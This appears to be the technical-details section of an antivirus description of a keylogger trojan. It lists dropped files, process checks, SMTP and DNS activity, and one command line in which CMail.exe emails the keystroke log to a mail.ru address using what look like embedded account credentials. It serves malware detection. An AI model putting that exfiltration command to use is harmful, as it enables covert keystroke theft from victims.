Техническая информация
- '%WINDIR%\CMail.exe' -host:lintroyfrom:1964Master@smtp.mail.ru -from:lintroyfrom@mail.ru -to:lintroy@mail.ru -a:%WINDIR%\system\log
- '%WINDIR%\keylog.exe'
- '%WINDIR%\troy1.exe'
- '<SYSTEM32>\find.exe' /I "keylog.exe"
- '<SYSTEM32>\tasklist.exe' /FI "ImageName EQ keylog.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\3.tmp\troy1.cmd" "
- %TEMP%\3.tmp\troy1.cmd
- %TEMP%\nse2.tmp\ExecDos.dll
- %WINDIR%\log
- %WINDIR%\system\log
- %WINDIR%\CMail.exe
- %TEMP%\nse2.tmp\System.dll
- %WINDIR%\keylog.exe
- %WINDIR%\troy1.exe
- %WINDIR%\wget.exe
- %TEMP%\nse2.tmp\System.dll
- %TEMP%\nse2.tmp\ExecDos.dll
- %TEMP%\3.tmp\troy1.cmd
- '94.##0.191.201':25
- DNS ASK sm##.mail.ru